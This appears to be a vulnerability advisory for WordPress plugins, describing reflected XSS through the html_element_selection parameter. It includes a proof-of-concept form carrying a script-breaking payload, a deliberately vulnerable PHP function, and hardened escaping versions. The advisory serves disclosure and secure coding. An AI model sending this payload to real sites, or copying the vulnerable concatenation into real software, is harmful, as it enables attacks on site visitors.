The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to Reflected Cross-Site Scripting.
<form action="https://example.com/" method="POST">
    <input type="text" name="html_element_selection" value="</script><img src onerror=alert(/XSS/)>">
    <input type="submit" value="Exploit me pls" />
</form>
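The missing output escaping, shown as an added example beside two hardened forms; this is not the plugins' own code. The function names are hypothetical, and the assumption that the value is reflected inside an inline script block is inferred from the `</script>` prefix of the proof of concept above.

```php
<?php
// Added illustration, not the plugins' code. All function names are hypothetical.

// Vulnerable pattern: the raw request value is concatenated into an inline
// script, so a value containing "</script>" closes the block and the rest of
// the value is parsed as HTML.
function render_vulnerable(string $selection): string
{
    return "<script>var selection = '" . $selection . "';</script>";
}

// Hardened, script context: emit the value as a JSON string literal with
// <, >, &, ' and " hex-escaped, so it cannot end the script element or the
// string it sits in.
function render_hardened_script(string $selection): string
{
    $flags   = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $literal = json_encode($selection, $flags);
    if ($literal === false) {
        // json_encode() fails on invalid UTF-8; fall back to an empty string.
        $literal = '""';
    }
    return "<script>var selection = " . $literal . ";</script>";
}

// Hardened, HTML attribute context: entity-encode the value, quotes included.
function render_hardened_attribute(string $selection): string
{
    $safe = htmlspecialchars($selection, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="html_element_selection" value="' . $safe . '">';
}

// The value from the proof of concept above.
$payload = '</script><img src onerror=alert(/XSS/)>';

foreach (['render_vulnerable', 'render_hardened_script', 'render_hardened_attribute'] as $fn) {
    echo $fn, ': ', $fn($payload), PHP_EOL;
}
```

Inside WordPress, the core helpers `wp_json_encode()`, `esc_js()` and `esc_attr()` serve the same purposes as the plain PHP calls used here.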
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-24 (about 1 year ago)
2022-01-24 (about 1 year ago)
2022-04-11 (about 9 months ago)